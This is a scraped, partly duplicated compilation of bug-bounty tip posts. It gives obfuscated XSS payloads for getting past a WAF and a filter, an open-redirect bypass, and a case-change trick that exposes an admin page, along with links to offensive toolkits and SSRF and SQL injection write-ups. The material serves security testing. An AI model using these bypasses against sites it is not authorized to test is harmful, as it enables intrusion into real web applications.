Imperva WAF Bypass for XSS;
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
- without parentheses, 'alert', 'document.domain' , 'window' , space
#BugBounty #BugBountyTip #WAF #infosec
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
- without parentheses, 'alert', 'document.domain' , 'window' , space
#BugBounty #BugBountyTip #WAF #infosec
Server Side Request Forgery via HTML injection in PDF download
https://blog.appsecco.com/server-side-request-forgery-via-html-injection-in-pdf-download-90ee4053e911
OTP Bypass on India’s Biggest Video Sharing Site
https://link.medium.com/dkdKvYCSC5
Exploiting an SSRF: Trials and Tribulations by @abugzlife1
https://link.medium.com/eUqLk4Bzu5
#bugbounty #bubgountytips
https://blog.appsecco.com/server-side-request-forgery-via-html-injection-in-pdf-download-90ee4053e911
OTP Bypass on India’s Biggest Video Sharing Site
https://link.medium.com/dkdKvYCSC5
Exploiting an SSRF: Trials and Tribulations by @abugzlife1
https://link.medium.com/eUqLk4Bzu5
#bugbounty #bubgountytips
Medium
Journey of a security bug — From a naive-looking PDF Download to SSRF via HTML Injection in AWS
A post about how I approached a novel security issue and now I feel I achieved an important milestone in my journey as a pentester.
Grep hostnames from ssl certificate
echo | openssl s_client -connect example\.com | openssl x509 -noout -text | grep DNS
#infosec #pentest #bugbounty
echo | openssl s_client -connect example\.com | openssl x509 -noout -text | grep DNS
#infosec #pentest #bugbounty
ffuf on Steroids
https://t.co/wwMbul2AXh
Scanning JS Files for Endpoints and Secrets
https://t.co/eN5UAj2JbO by @dark_warlord14
Path confusion
https://t.co/wcKROUlNmP
Six years of the GitHub Security Bug Bounty program
https://t.co/Ptm95lnCDq
#bugbounty,#bugbountytips
https://t.co/wwMbul2AXh
Scanning JS Files for Endpoints and Secrets
https://t.co/eN5UAj2JbO by @dark_warlord14
Path confusion
https://t.co/wcKROUlNmP
Six years of the GitHub Security Bug Bounty program
https://t.co/Ptm95lnCDq
#bugbounty,#bugbountytips
SecurityJunky.com
Scanning JS Files for Endpoints and Secrets » SecurityJunky.com
Scanning JavaScript files for Endpoints and Secrets to increase attack surface for Recon and Bug Bounty.
Open Redirect Bypass
?redirect=https://test.target.com > accepts any subdomain of target to redirect
?redirect=https://google.comğ.target.com > "Ğ" is a Turkish character, server can't render it and changes it to "?"
So it redirects to http://google.com/?target.com
#bugbounty #bugbountytip
?redirect=https://test.target.com > accepts any subdomain of target to redirect
?redirect=https://google.comğ.target.com > "Ğ" is a Turkish character, server can't render it and changes it to "?"
So it redirects to http://google.com/?target.com
#bugbounty #bugbountytip
#Sqli #bugbounty
https://t.co/Rg4aZzXGCl
https://t.co/E8pzuztGrs
https://t.co/33rsA6UdcY
https://t.co/cX7uDnrTbw
https://t.co/K5ozYnr9SR
https://t.co/VJrQvjcFq4
https://t.co/qjq65XcPID
https://t.co/cmu9ItaGbp
https://t.co/ynGJv2SRyh
#bugbountytips
https://t.co/Rg4aZzXGCl
https://t.co/E8pzuztGrs
https://t.co/33rsA6UdcY
https://t.co/cX7uDnrTbw
https://t.co/K5ozYnr9SR
https://t.co/VJrQvjcFq4
https://t.co/qjq65XcPID
https://t.co/cmu9ItaGbp
https://t.co/ynGJv2SRyh
#bugbountytips
Yappare
Tricky Oracle SQL Injection Situation
Recently I learnt few new stuff when solving SQL Injection found during pentest and also bugbounty. One of the new technique that seems new...
[XSS] #BugBountyTips
Found a weird XSS filter bypass using this payload:
<style/><img src="z'z</style><script/z>alert(1)</script>">
#BugBounty @XssPayloads
Found a weird XSS filter bypass using this payload:
<style/><img src="z'z</style><script/z>alert(1)</script>">
#BugBounty @XssPayloads
#Pentest #bugbounty
https://github.com/k8gege/K8tools
https://github.com/mbechler/marshalsec
https://github.com/lanjelot/patator
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/evilcos/xssor2
https://github.com/cujanovic/SSRF-Testing
https://github.com/LandGrey/pydictor
https://github.com/m0rtem/CloudFail
https://github.com/1N3/Findsploit
https://github.com/rewardone/OSCPRepo
#bugbountytips
https://github.com/k8gege/K8tools
https://github.com/mbechler/marshalsec
https://github.com/lanjelot/patator
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/evilcos/xssor2
https://github.com/cujanovic/SSRF-Testing
https://github.com/LandGrey/pydictor
https://github.com/m0rtem/CloudFail
https://github.com/1N3/Findsploit
https://github.com/rewardone/OSCPRepo
#bugbountytips
GitHub
GitHub - k8gege/K8tools: K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/Ove…
K8工具合集(内网渗透/提权工具/远程溢出/漏洞利用/扫描工具/密码破解/免杀工具/Exploit/APT/0day/Shellcode/Payload/priviledge/BypassUAC/OverFlow/WebShell/PenTest) Web GetShell Exploit(Struts2/Zimbra/Weblogic/Tomcat/Apache/Jboss/DotNetN...
#bugbounty Tools
Scanners-Box
https://t.co/Kl8KyFqCtl
K8tools
https://t.co/Vc9Nm6AhLt
arachni
https://t.co/jyhK1yNlkH
Osmedeus
https://t.co/4maQSFojzs
Findsploit
https://t.co/kgO1lJfwRK
StaCoAn
https://t.co/er4opW1l5J
#bugbountytips
Scanners-Box
https://t.co/Kl8KyFqCtl
K8tools
https://t.co/Vc9Nm6AhLt
arachni
https://t.co/jyhK1yNlkH
Osmedeus
https://t.co/4maQSFojzs
Findsploit
https://t.co/kgO1lJfwRK
StaCoAn
https://t.co/er4opW1l5J
#bugbountytips
GitHub
We5ter/Scanners-Box
A powerful hacker toolkit collected more than 10 categories of open source scanners from Github - 安全行业从业者自研开源扫描器合辑 - We5ter/Scanners-Box
Tip of the day ...
http://sub.target.com/web/admin/ => 302 redirect to main domain
http://sub.target.com/web/aDmiN/ =>200 ok admin login page
http://sub.target.com/web/aDmiN/FUZZ =>$Critical sensitive files$
#bugbountytip #bugbountytips #Bugbounty
http://sub.target.com/web/admin/ => 302 redirect to main domain
http://sub.target.com/web/aDmiN/ =>200 ok admin login page
http://sub.target.com/web/aDmiN/FUZZ =>$Critical sensitive files$
#bugbountytip #bugbountytips #Bugbounty